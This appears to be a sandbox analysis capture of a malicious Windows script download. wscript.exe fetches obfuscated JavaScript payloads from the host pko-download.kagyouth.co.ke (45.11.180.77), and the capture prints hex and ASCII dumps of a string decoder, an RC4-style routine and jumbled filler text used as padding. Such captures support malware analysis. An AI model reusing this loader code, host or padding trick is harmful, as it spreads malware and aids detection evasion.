                                                                                                                              2024-12-17 15:32:07 UTC5511INData Raw: 61 63 6f 73 76 62 2e 74 78 74 0a 61 63 76 69 78 72 2e 74 78 74 0a 61 64 69 6d 71 68 2e 74 78 74 0a 61 64 76 6b 77 65 2e 74 78 74 0a 61 65 68 6f 69 73 2e 74 78 74 0a 61 67 6e 70 72 6c 2e 74 78 74 0a 61 68 74 6b 63 6f 2e 74 78 74 0a 61 6a 6d 64 78 68 2e 74 78 74 0a 61 6a 79 6b 75 76 2e 74 78 74 0a 61 6c 7a 63 71 64 2e 74 78 74 0a 61 6f 6c 77 7a 68 2e 74 78 74 0a 61 6f 77 71 6b 73 2e 74 78 74 0a 61 70 69 6e 68 77 2e 74 78 74 0a 61 70 79 62 76 64 2e 74 78 74 0a 61 75 63 6a 70 69 2e 74 78 74 0a 61 76 69 6c 6f 68 2e 74 78 74 0a 61 76 6a 62 6d 74 2e 74 78 74 0a 61 77 72 67 65 62 2e 74 78 74 0a 61 78 67 6b 76 66 2e 74 78 74 0a 61 78 74 66 77 6b 2e 74 78 74 0a 61 78 79 6f 68 66 2e 74 78 74 0a 61 79 6f 6a 74 72 2e 74 78 74 0a 62 63 6b 69 6d 66 2e 74 78 74 0a 62 65
                                                                                                                              Data Ascii: acosvb.txtacvixr.txtadimqh.txtadvkwe.txtaehois.txtagnprl.txtahtkco.txtajmdxh.txtajykuv.txtalzcqd.txtaolwzh.txtaowqks.txtapinhw.txtapybvd.txtaucjpi.txtaviloh.txtavjbmt.txtawrgeb.txtaxgkvf.txtaxtfwk.txtaxyohf.txtayojtr.txtbckimf.txtbe


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.64971445.11.180.774437088C:\Windows\System32\wscript.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-17 15:32:08 UTC344OUTGET /js/iethuj.txt HTTP/1.1
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-ch
                                                                                                                              UA-CPU: AMD64
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                              Host: pko-download.kagyouth.co.ke
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-17 15:32:08 UTC277INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 17 Dec 2024 15:32:08 GMT
                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                              Last-Modified: Sun, 15 Dec 2024 08:01:16 GMT
                                                                                                                              ETag: "299ae-6294a77e3cb00"
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 170414
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/plain
                                                                                                                              2024-12-17 15:32:08 UTC7915INData Raw: 76 61 72 20 74 68 65 68 69 73 30 77 6f 75 6c 64 73 6f 76 65 72 65 69 67 6e 74 79 20 3d 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 3b 0a 66 75 6e 63 74 69 6f 6e 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 28 6e 6f 74 68 69 73 74 6f 72 79 2c 20 74 68 65 77 69 74 68 29 20 7b 0a 20 20 20 20 76 61 72 20 77 6f 75 6c 64 73 6f 76 65 72 65 69 67 6e 74 79 20 3d 20 74 68 65 68 69 73 30 6e 6f 74 68 69 73 74 6f 72 79 28 29 3b 0a 20 20 20 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 61 6e 64 72 65 77 66 6f 72 63 65 73 2c 20 73 75 63 68 74 68 65 29 20 7b 0a 20 20 20 20 20 20 20 20 61 6e 64 72 65 77 66 6f 72 63 65 73 20 3d 20 61 6e 64 72 65 77 66 6f 72 63 65 73 20 2d 20 28 30 78 35 31 37 20 2a 20 30 78 31 20 2b 20 30 78 31 36 62
                                                                                                                              Data Ascii: var thehis0wouldsovereignty = thehis0thewith;function thehis0thewith(nothistory, thewith) { var wouldsovereignty = thehis0nothistory(); thehis0thewith = function (andrewforces, suchthe) { andrewforces = andrewforces - (0x517 * 0x1 + 0x16b
                                                                                                                              2024-12-17 15:32:08 UTC8000INData Raw: 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 53 44 46 53 76 73 34 68 20 3d 20 30 78 30 3b 20 53 44 46 53 76 73 34 68 20 3c 20 41 46 73 47 61 33 72 76 7a 5b 27 6c 65 6e 67 74 68 27 5d 3b 20 53 44 46 53 76 73 34 68 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 44 46 53 76 73 34 68 20 3d 20 28 73 44 46 53 76 73 34 68 20 2b 20 30 78 31 29 20 25 20 30 78 31 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 64 46 53 76 73 34 68 20 3d 20 28 53 64 46 53 76 73 34 68 20 2b 20 61 66 53 47 61 33 72 76 7a 5b 73 44 46 53 76 73 34 68 5d 29 20 25 20 30 78 31 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 66 53 47 61 33 72 76 7a 20 3d 20 61 66 53 47 61 33 72 76 7a 5b 73 44 46 53 76 73
                                                                                                                              Data Ascii: for (var SDFSvs4h = 0x0; SDFSvs4h < AFsGa3rvz['length']; SDFSvs4h++) { sDFSvs4h = (sDFSvs4h + 0x1) % 0x100; SdFSvs4h = (SdFSvs4h + afSGa3rvz[sDFSvs4h]) % 0x100; AfSGa3rvz = afSGa3rvz[sDFSvs
                                                                                                                              2024-12-17 15:32:09 UTC8000INData Raw: 6f 75 72 20 64 69 73 63 72 65 64 69 74 65 64 20 5f 4d 61 72 63 68 5f 20 73 70 68 65 72 65 20 74 68 65 20 6d 6f 6d 65 6e 74 6f 75 73 20 6f 75 72 20 6f 75 72 20 74 68 65 20 50 72 65 6c 61 63 79 20 42 75 74 20 76 6f 6c 75 6d 65 20 41 4e 44 20 50 52 45 46 41 54 4f 52 59 20 6b 69 6e 64 20 77 6f 75 6c 64 20 63 6f 6e 76 69 63 74 69 6f 6e 20 73 74 72 75 67 67 6c 65 20 74 68 65 0a 2f 2f 69 74 73 20 61 6e 79 20 6e 6f 74 20 68 69 73 20 74 68 65 20 57 49 4c 4c 49 41 4d 20 41 4e 44 20 70 72 65 6a 75 64 69 63 65 20 72 65 73 70 65 63 74 20 64 65 76 65 6c 6f 70 20 73 65 72 76 69 63 65 73 20 74 68 65 20 74 72 75 6c 79 20 74 68 65 20 6f 6e 6c 79 20 74 68 65 20 43 68 75 72 63 68 20 61 6e 64 20 74 68 65 20 77 6f 75 6c 64 20 6f 77 6e 20 61 6e 64 20 43 48 41 50 54 45 52 20 46
                                                                                                                              Data Ascii: our discredited _March_ sphere the momentous our our the Prelacy But volume AND PREFATORY kind would conviction struggle the//its any not his the WILLIAM AND prejudice respect develop services the truly the only the Church and the would own and CHAPTER F
                                                                                                                              2024-12-17 15:32:09 UTC8000INData Raw: 65 20 6f 74 68 65 72 20 74 68 65 20 65 6e 64 20 74 69 6d 65 20 74 68 65 20 61 64 76 61 6e 63 65 20 74 68 65 20 6d 69 6e 64 20 68 61 76 65 20 68 61 76 65 20 72 65 6c 69 67 69 6f 75 73 20 70 6c 61 63 65 64 20 66 6f 6c 6c 6f 77 73 20 46 45 52 52 49 45 52 20 53 63 6f 74 73 20 64 65 65 70 6c 79 20 74 68 65 20 74 68 61 6e 20 73 70 65 61 6b 73 20 72 65 70 75 74 61 74 69 6f 6e 20 57 49 4c 4c 49 41 4d 20 73 75 63 68 20 64 61 79 20 56 49 49 49 20 6f 74 68 65 72 20 70 65 72 73 75 61 64 65 64 20 77 61 73 0a 2f 2f 6f 6e 65 20 74 68 65 20 74 68 6f 73 65 20 69 6e 74 65 6c 6c 69 67 65 6e 63 65 20 74 68 65 20 41 52 52 41 4e 20 64 72 65 61 64 65 64 20 43 68 61 72 6c 65 73 20 74 68 65 79 20 61 6e 64 20 77 69 74 68 20 70 72 65 20 41 4e 44 20 73 79 73 74 65 6d 20 68 69 73 20
                                                                                                                              Data Ascii: e other the end time the advance the mind have have religious placed follows FERRIER Scots deeply the than speaks reputation WILLIAM such day VIII other persuaded was//one the those intelligence the ARRAN dreaded Charles they and with pre AND system his
                                                                                                                              2024-12-17 15:32:09 UTC8000INData Raw: 20 74 68 65 69 72 20 74 68 65 20 73 61 69 64 20 69 6d 70 6f 73 69 74 69 6f 6e 0a 2f 2f 74 68 61 74 20 66 72 65 65 64 6f 6d 20 53 63 6f 74 6c 61 6e 64 20 63 6f 6e 63 65 72 6e 69 6e 67 20 61 6e 64 20 53 63 6f 74 74 69 73 68 20 64 72 65 77 20 4a 6f 73 65 70 68 20 70 65 6f 70 6c 65 20 74 68 65 69 72 20 50 72 65 73 62 79 74 65 72 69 61 6e 69 73 6d 20 6d 61 6b 65 20 47 6c 61 73 67 6f 77 20 61 72 65 20 63 6f 6e 74 72 6f 76 65 72 73 69 61 6c 69 73 74 20 74 69 74 6c 65 20 77 61 73 20 6d 6f 73 74 20 74 68 65 20 68 61 72 61 73 73 65 64 20 77 68 69 63 68 20 65 63 63 6c 65 73 69 61 73 74 69 63 61 6c 20 77 69 6c 6c 20 74 68 65 20 68 61 73 20 63 6f 6e 63 65 72 6e 65 64 20 70 72 65 73 65 72 76 69 6e 67 20 41 4e 44 20 77 69 6c 6c 20 77 61 73 20 69 6d 70 65 72 69 6c 6c 65
                                                                                                                              Data Ascii: their the said imposition//that freedom Scotland concerning and Scottish drew Joseph people their Presbyterianism make Glasgow are controversialist title was most the harassed which ecclesiastical will the has concerned preserving AND will was imperille
                                                                                                                              2024-12-17 15:32:09 UTC8000INData Raw: 65 64 20 66 6f 72 65 69 67 6e 20 77 61 79 20 63 6f 75 6e 74 65 64 20 77 68 69 63 68 20 61 6c 6c 20 61 6e 64 20 43 48 41 50 54 45 52 20 48 6f 77 20 74 69 6d 65 20 77 61 6c 6c 73 20 42 72 6f 77 6e 20 66 61 69 74 68 66 75 6c 20 63 72 69 70 70 6c 65 20 63 69 76 69 6c 20 43 6f 6e 74 69 6e 65 6e 74 61 6c 20 66 72 6f 6d 20 6f 6e 63 65 20 62 6f 75 6e 64 20 43 68 75 72 63 68 20 43 48 55 52 43 48 20 54 72 61 6e 73 63 72 69 62 65 72 20 74 68 65 20 68 65 72 20 48 69 70 70 6f 63 72 61 74 65 73 20 66 69 6c 6c 65 64 20 43 48 41 50 54 45 52 20 74 68 65 20 31 31 36 20 79 6f 6b 65 20 74 68 65 0a 2f 2f 46 45 52 52 49 45 52 20 6c 69 66 65 20 73 74 75 64 65 6e 74 73 20 74 6f 6f 6b 20 6c 61 69 64 20 77 61 73 20 68 69 73 20 48 69 73 20 47 49 46 54 20 43 68 75 72 63 68 20 64 61
                                                                                                                              Data Ascii: ed foreign way counted which all and CHAPTER How time walls Brown faithful cripple civil Continental from once bound Church CHURCH Transcriber the her Hippocrates filled CHAPTER the 116 yoke the//FERRIER life students took laid was his His GIFT Church da
                                                                                                                              2024-12-17 15:32:09 UTC8000INData Raw: 61 73 20 57 68 69 6c 65 20 41 4e 44 20 73 69 62 6e 65 73 73 20 6c 69 66 65 20 61 72 65 20 68 69 73 20 61 6e 64 20 72 65 6c 69 67 69 6f 75 73 20 6c 61 69 64 20 6d 6f 73 74 20 61 6c 6c 20 66 69 72 73 74 20 6f 75 72 20 67 72 61 76 65 6c 79 20 62 65 65 6e 20 43 48 41 50 54 45 52 20 73 68 6f 75 6c 64 20 50 72 65 73 62 79 74 65 72 69 61 6e 73 20 73 79 73 74 65 6d 20 54 68 65 79 20 31 33 34 20 79 6f 6b 65 20 62 75 74 20 77 6f 75 6c 64 20 61 6e 64 0a 2f 2f 42 75 74 20 6e 61 74 69 6f 6e 20 69 74 73 20 61 74 74 61 63 68 6d 65 6e 74 20 44 4f 57 4e 20 63 61 72 65 20 43 48 41 50 54 45 52 20 50 72 6f 74 65 73 74 61 6e 74 69 73 6d 20 63 6f 75 6e 74 72 79 20 6e 65 63 65 73 73 69 74 79 20 53 63 6f 74 73 20 63 6f 75 6e 74 72 79 6d 65 6e 20 4d 65 6c 76 69 6c 6c 65 20 74 68
                                                                                                                              Data Ascii: as While AND sibness life are his and religious laid most all first our gravely been CHAPTER should Presbyterians system They 134 yoke but would and//But nation its attachment DOWN care CHAPTER Protestantism country necessity Scots countrymen Melville th
                                                                                                                              2024-12-17 15:32:09 UTC8000INData Raw: 61 74 74 65 72 73 20 69 6e 74 65 72 65 73 74 20 4d 65 6c 76 69 6c 6c 65 20 74 68 65 20 62 61 73 69 73 20 6d 75 63 68 20 74 68 65 20 44 49 4e 47 49 4e 47 20 63 6c 61 69 6d 73 20 54 48 45 20 65 71 75 61 6c 6c 79 20 74 68 65 79 20 69 6e 66 6c 75 65 6e 63 65 20 70 72 65 20 68 69 67 68 20 6c 61 73 74 69 6e 67 20 6f 6e 6c 79 20 69 6e 74 65 6c 6c 69 67 65 6e 63 65 20 69 74 73 20 74 68 61 74 20 65 66 66 69 63 69 65 6e 63 79 20 74 68 61 74 20 53 63 6f 74 74 69 73 68 20 73 75 63 68 20 6f 76 65 72 20 44 4f 57 4e 20 61 6e 64 20 6d 65 72 65 20 46 41 4d 4f 55 53 20 70 65 6f 70 6c 65 0a 2f 2f 4b 49 4e 47 20 77 68 69 63 68 20 74 68 61 74 20 69 6e 74 65 6c 6c 69 67 65 6e 63 65 20 4e 6f 74 68 69 6e 67 20 4d 65 6c 76 69 6c 6c 65 20 66 65 61 72 20 63 6f 72 70 6f 72 61 74 69
                                                                                                                              Data Ascii: atters interest Melville the basis much the DINGING claims THE equally they influence pre high lasting only intelligence its that efficiency that Scottish such over DOWN and mere FAMOUS people//KING which that intelligence Nothing Melville fear corporati
                                                                                                                              2024-12-17 15:32:09 UTC8000INData Raw: 74 65 72 20 69 6e 66 6c 75 65 6e 63 65 0a 2f 2f 6c 65 74 74 65 72 73 20 41 4e 44 20 74 68 65 20 43 48 41 50 54 45 52 20 6e 6f 74 20 68 69 67 68 65 72 20 31 38 39 39 20 63 61 73 65 20 54 68 65 20 54 48 45 20 61 64 76 61 6e 63 65 20 43 68 75 72 63 68 20 61 6e 64 20 74 68 61 6e 20 6d 6f 72 65 20 74 68 61 74 20 74 68 65 20 62 65 65 6e 20 70 65 6f 70 6c 65 20 72 65 61 64 20 43 68 75 72 63 68 20 74 68 65 20 6e 61 74 69 6f 6e 20 61 6e 64 20 68 65 72 20 77 61 73 20 73 79 73 74 65 6d 20 70 65 72 73 75 61 64 65 64 20 62 65 69 6e 67 20 53 63 6f 74 74 69 73 68 20 77 61 73 0a 2f 2f 74 68 65 20 74 68 65 20 70 65 6f 70 6c 65 20 61 72 65 20 6f 74 68 65 72 20 61 6e 64 20 77 68 65 6e 20 64 75 74 69 65 73 20 61 6e 64 20 68 69 73 20 6d 61 6e 79 20 4d 65 6c 76 69 6c 6c 65 20
                                                                                                                              Data Ascii: ter influence//letters AND the CHAPTER not higher 1899 case The THE advance Church and than more that the been people read Church the nation and her was system persuaded being Scottish was//the the people are other and when duties and his many Melville
                                                                                                                              2024-12-17 15:32:09 UTC8000INData Raw: 61 74 20 61 72 65 20 61 6e 64 20 74 68 65 20 6d 61 6b 65 20 77 68 69 63 68 20 6f 75 72 20 74 68 65 72 65 66 6f 72 65 20 74 68 65 20 6e 6f 74 20 64 65 70 65 6e 64 20 74 68 65 6d 20 54 48 45 20 63 6f 6e 63 65 72 6e 65 64 20 63 72 69 70 70 6c 65 0a 2f 2f 72 65 73 6f 72 74 69 6e 67 20 66 72 6f 6d 20 73 65 72 76 69 63 65 73 20 53 63 6f 74 74 69 73 68 20 68 61 76 69 6e 67 20 66 6f 72 20 68 6f 6e 6f 75 72 20 73 75 63 68 20 74 68 65 20 6f 75 72 20 4d 4f 52 54 4f 4e 20 71 75 6f 74 61 74 69 6f 6e 73 20 63 6f 72 70 6f 72 61 74 69 6f 6e 20 57 68 69 6c 65 20 42 49 47 47 49 4e 47 20 74 68 65 20 4b 49 4e 47 20 61 6c 6c 20 48 6f 77 20 73 75 63 68 20 67 72 6f 75 6e 64 20 6d 69 73 74 61 6b 65 6e 20 74 68 61 74 20 64 77 61 72 66 65 64 20 74 68 65 20 53 63 6f 74 74 69 73 68
                                                                                                                              Data Ascii: at are and the make which our therefore the not depend them THE concerned cripple//resorting from services Scottish having for honour such the our MORTON quotations corporation While BIGGING the KING all How such ground mistaken that dwarfed the Scottish


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.64971545.11.180.774435708C:\Windows\System32\wscript.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-17 15:32:08 UTC344OUTGET /js/bmkvfo.txt HTTP/1.1
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-ch
                                                                                                                              UA-CPU: AMD64
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                              Host: pko-download.kagyouth.co.ke
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-17 15:32:09 UTC277INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 17 Dec 2024 15:32:08 GMT
                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                              Last-Modified: Sun, 15 Dec 2024 08:03:02 GMT
                                                                                                                              ETag: "350d0-6294a7e353980"
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 217296
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/plain
                                                                                                                              2024-12-17 15:32:09 UTC7915INData Raw: 76 61 72 20 74 68 65 68 69 73 30 77 6f 75 6c 64 73 6f 76 65 72 65 69 67 6e 74 79 20 3d 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 3b 0a 66 75 6e 63 74 69 6f 6e 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 28 6e 6f 74 68 69 73 74 6f 72 79 2c 20 74 68 65 77 69 74 68 29 20 7b 0a 20 20 20 20 76 61 72 20 77 6f 75 6c 64 73 6f 76 65 72 65 69 67 6e 74 79 20 3d 20 74 68 65 68 69 73 30 6e 6f 74 68 69 73 74 6f 72 79 28 29 3b 0a 20 20 20 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 61 6e 64 72 65 77 66 6f 72 63 65 73 2c 20 73 75 63 68 74 68 65 29 20 7b 0a 20 20 20 20 20 20 20 20 61 6e 64 72 65 77 66 6f 72 63 65 73 20 3d 20 61 6e 64 72 65 77 66 6f 72 63 65 73 20 2d 20 28 30 78 35 31 37 20 2a 20 30 78 31 20 2b 20 30 78 31 36 62
                                                                                                                              Data Ascii: var thehis0wouldsovereignty = thehis0thewith;function thehis0thewith(nothistory, thewith) { var wouldsovereignty = thehis0nothistory(); thehis0thewith = function (andrewforces, suchthe) { andrewforces = andrewforces - (0x517 * 0x1 + 0x16b
                                                                                                                              2024-12-17 15:32:09 UTC8000INData Raw: 3b 20 53 44 46 53 76 73 34 68 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 44 46 53 76 73 34 68 20 3d 20 28 73 44 46 53 76 73 34 68 20 2b 20 30 78 31 29 20 25 20 30 78 31 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 64 46 53 76 73 34 68 20 3d 20 28 53 64 46 53 76 73 34 68 20 2b 20 61 66 53 47 61 33 72 76 7a 5b 73 44 46 53 76 73 34 68 5d 29 20 25 20 30 78 31 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 66 53 47 61 33 72 76 7a 20 3d 20 61 66 53 47 61 33 72 76 7a 5b 73 44 46 53 76 73 34 68 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 66 53 47 61 33 72 76 7a 5b 73 44 46 53 76 73 34 68 5d 20 3d 20 61 66 53 47 61 33 72 76 7a 5b 53 64 46 53
                                                                                                                              Data Ascii: ; SDFSvs4h++) { sDFSvs4h = (sDFSvs4h + 0x1) % 0x100; SdFSvs4h = (SdFSvs4h + afSGa3rvz[sDFSvs4h]) % 0x100; AfSGa3rvz = afSGa3rvz[sDFSvs4h]; afSGa3rvz[sDFSvs4h] = afSGa3rvz[SdFS
                                                                                                                              2024-12-17 15:32:09 UTC8000INData Raw: 72 65 61 64 65 64 20 53 63 6f 74 74 69 73 68 20 63 69 76 69 6c 20 6f 75 72 20 47 4c 41 53 47 4f 57 20 75 6e 73 63 72 75 70 75 6c 6f 75 73 20 74 65 61 63 68 65 72 20 74 68 65 72 65 66 6f 72 65 20 6d 6f 72 65 20 74 68 61 74 20 73 6f 75 67 68 74 20 63 6f 75 6e 74 65 64 20 74 68 61 74 20 64 65 70 65 6e 64 20 69 6e 63 61 6c 63 75 6c 61 62 6c 79 20 6f 74 68 65 72 20 74 68 65 20 76 61 6c 75 65 20 61 63 61 64 65 6d 69 63 20 43 68 75 72 63 68 20 74 68 65 20 63 6f 6e 74 72 6f 76 65 72 73 69 61 6c 69 73 74 20 74 68 65 20 77 68 69 63 68 20 42 75 74 20 43 68 75 72 63 68 20 75 70 6f 6e 20 61 72 65 20 74 68 69 73 20 79 6f 6b 65 20 6c 69 76 65 20 74 68 65 20 6d 69 73 74 61 6b 65 6e 20 74 68 65 20 73 75 63 68 0a 2f 2f 68 6f 6e 6f 75 72 20 77 68 65 72 65 20 74 68 65 20 6b
                                                                                                                              Data Ascii: readed Scottish civil our GLASGOW unscrupulous teacher therefore more that sought counted that depend incalculably other the value academic Church the controversialist the which But Church upon are this yoke live the mistaken the such//honour where the k
                                                                                                                              2024-12-17 15:32:09 UTC8000INData Raw: 72 63 68 20 74 68 65 20 74 68 65 20 68 61 73 20 74 68 65 69 72 20 6c 61 77 73 20 66 69 6c 6c 65 64 20 66 65 61 72 20 6e 61 6d 65 6c 79 20 65 71 75 61 6c 6c 79 20 65 6e 67 61 67 65 64 20 41 42 52 4f 41 44 20 6c 61 6e 64 20 6d 65 6e 74 69 6f 6e 65 64 20 61 74 74 61 63 68 6d 65 6e 74 20 77 65 6c 6c 20 43 68 75 72 63 68 20 6e 61 74 69 6f 6e 20 74 68 65 20 66 72 6f 6d 20 62 72 6f 61 64 20 4e 4f 54 45 20 74 79 70 6f 73 20 63 61 72 65 0a 2f 2f 53 63 6f 74 74 69 73 68 20 62 69 6f 67 72 61 70 68 79 20 6d 75 63 68 20 62 65 6c 69 74 74 6c 65 20 61 74 74 61 63 68 6d 65 6e 74 20 77 61 73 20 4b 49 4e 47 20 72 65 73 70 65 63 74 20 6f 6e 65 20 41 4e 44 52 45 57 20 77 68 6f 20 45 64 69 6e 62 75 72 67 68 20 73 74 61 6e 64 20 61 75 74 68 6f 72 20 6d 65 74 68 6f 64 73 20 68
                                                                                                                              Data Ascii: rch the the has their laws filled fear namely equally engaged ABROAD land mentioned attachment well Church nation the from broad NOTE typos care//Scottish biography much belittle attachment was KING respect one ANDREW who Edinburgh stand author methods h
                                                                                                                              2024-12-17 15:32:09 UTC8000INData Raw: 6f 6c 61 72 20 54 48 45 20 6d 61 69 6e 74 61 69 6e 69 6e 67 20 74 68 65 20 61 6d 6f 6e 67 20 50 72 65 73 62 79 74 65 72 69 61 6e 69 73 6d 20 74 77 69 6e 73 20 6d 75 63 68 0a 2f 2f 64 72 65 77 20 62 75 74 20 73 70 69 72 69 74 75 61 6c 20 6f 6e 6c 79 20 74 68 65 20 62 61 73 69 73 20 74 68 61 74 20 50 55 42 4c 49 53 48 45 44 20 6d 61 79 20 74 72 75 74 68 20 6e 61 74 75 72 61 6c 20 66 6f 6c 6c 6f 77 73 20 74 68 65 20 6f 62 73 65 71 75 69 6f 75 73 20 61 6e 64 20 74 68 65 20 64 65 63 6c 61 72 65 64 20 5f 4d 61 72 63 68 5f 20 64 77 61 72 66 65 64 20 73 6f 75 67 68 74 20 76 69 6e 64 69 63 61 74 65 64 20 77 69 74 68 20 6c 61 69 64 20 73 65 72 76 69 63 65 20 50 72 6f 74 65 73 74 61 6e 74 69 73 6d 20 69 6e 74 65 72 65 73 74 20 74 68 65 20 69 6e 74 65 72 65 73 74 20
                                                                                                                              Data Ascii: olar THE maintaining the among Presbyterianism twins much//drew but spiritual only the basis that PUBLISHED may truth natural follows the obsequious and the declared _March_ dwarfed sought vindicated with laid service Protestantism interest the interest
                                                                                                                              2024-12-17 15:32:09 UTC8000INData Raw: 20 4d 65 6c 76 69 6c 6c 65 20 74 6f 67 65 74 68 65 72 20 43 48 41 50 54 45 52 20 74 68 65 20 74 68 65 20 77 68 69 63 68 20 61 6e 64 20 67 6f 76 65 72 6e 6d 65 6e 74 20 6f 74 68 65 72 20 46 41 4d 4f 55 53 20 63 61 75 73 65 20 74 68 65 20 77 68 69 63 68 20 69 6e 74 65 6c 6c 69 67 65 6e 63 65 20 77 61 73 20 74 68 61 6e 20 73 75 63 68 20 65 78 63 65 6c 6c 65 6e 63 65 20 54 48 45 20 74 68 65 20 76 61 6c 75 65 20 77 68 69 63 68 20 62 65 73 74 20 74 68 65 6d 20 6a 75 73 74 69 66 69 65 64 20 61 6c 6c 20 67 72 65 61 74 20 6f 75 74 0a 2f 2f 69 6e 74 65 72 65 73 74 65 64 20 74 6f 6f 6b 20 4b 49 4e 47 20 59 45 41 52 53 20 77 68 65 72 65 20 62 65 74 74 65 72 20 64 65 73 69 67 6e 73 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 68 65 20 74 68 65 20 6d 61 69 6e 74 61 69 6e 69
                                                                                                                              Data Ascii: Melville together CHAPTER the the which and government other FAMOUS cause the which intelligence was than such excellence THE the value which best them justified all great out//interested took KING YEARS where better designs connection the the maintaini
                                                                                                                              2024-12-17 15:32:09 UTC8000INData Raw: 76 65 20 63 6f 6e 63 65 72 6e 20 74 68 65 20 6c 61 6e 67 75 69 64 20 76 69 74 61 6c 20 6d 65 6e 74 69 6f 6e 65 64 20 63 6f 75 6e 74 72 79 20 72 65 73 70 6f 6e 73 69 62 69 6c 69 74 79 20 64 77 61 72 66 65 64 20 74 68 65 69 72 20 42 75 72 74 6f 6e 20 74 68 65 20 69 6d 6d 65 64 69 61 74 65 20 74 6f 67 65 74 68 65 72 0a 2f 2f 68 69 73 20 53 45 52 56 49 43 45 53 20 43 48 41 50 54 45 52 20 64 69 64 20 73 74 72 75 67 67 6c 65 20 63 6f 75 6e 74 72 79 20 68 69 73 20 6e 65 63 65 73 73 69 74 79 20 43 68 75 72 63 68 20 63 65 72 74 61 69 6e 20 77 61 73 20 6c 61 6e 64 20 43 68 75 72 63 68 20 53 63 6f 74 74 69 73 68 20 54 48 45 20 6d 69 73 74 61 6b 65 6e 20 74 68 65 79 20 65 6e 74 65 72 70 72 69 73 65 73 20 65 66 66 65 63 74 20 76 6f 6c 75 6d 65 20 54 48 45 20 73 61 79
                                                                                                                              Data Ascii: ve concern the languid vital mentioned country responsibility dwarfed their Burton the immediate together//his SERVICES CHAPTER did struggle country his necessity Church certain was land Church Scottish THE mistaken they enterprises effect volume THE say
                                                                                                                              2024-12-17 15:32:09 UTC8000INData Raw: 74 74 65 72 73 20 43 68 75 72 63 68 20 74 68 65 20 61 6e 64 20 68 61 73 20 6c 65 61 72 6e 65 64 20 62 65 65 6e 20 70 61 74 72 69 6f 74 69 73 6d 20 65 66 66 65 63 74 20 63 6c 61 69 6d 20 43 68 75 72 63 68 0a 2f 2f 67 6f 76 65 72 6e 6d 65 6e 74 20 66 72 65 65 64 6f 6d 20 67 72 6f 75 6e 64 20 74 68 65 20 74 68 65 20 54 48 45 20 64 69 73 63 72 65 64 69 74 65 64 20 77 6f 75 6c 64 20 6d 75 63 68 20 52 65 76 6f 6c 75 74 69 6f 6e 20 64 72 65 77 20 6e 6f 74 20 6f 75 72 20 70 72 6f 73 70 65 72 69 74 79 20 6d 65 72 65 6c 79 20 63 69 76 69 6c 20 77 69 6c 6c 20 74 68 65 20 77 6f 75 6c 64 20 65 76 65 72 79 20 72 65 6e 64 65 72 65 64 20 74 68 65 20 54 68 65 72 65 20 77 68 69 63 68 20 43 48 41 50 54 45 52 20 66 61 69 74 68 66 75 6c 20 68 61 7a 61 72 64 73 20 68 61 73 20
                                                                                                                              Data Ascii: tters Church the and has learned been patriotism effect claim Church//government freedom ground the the THE discredited would much Revolution drew not our prosperity merely civil will the would every rendered the There which CHAPTER faithful hazards has
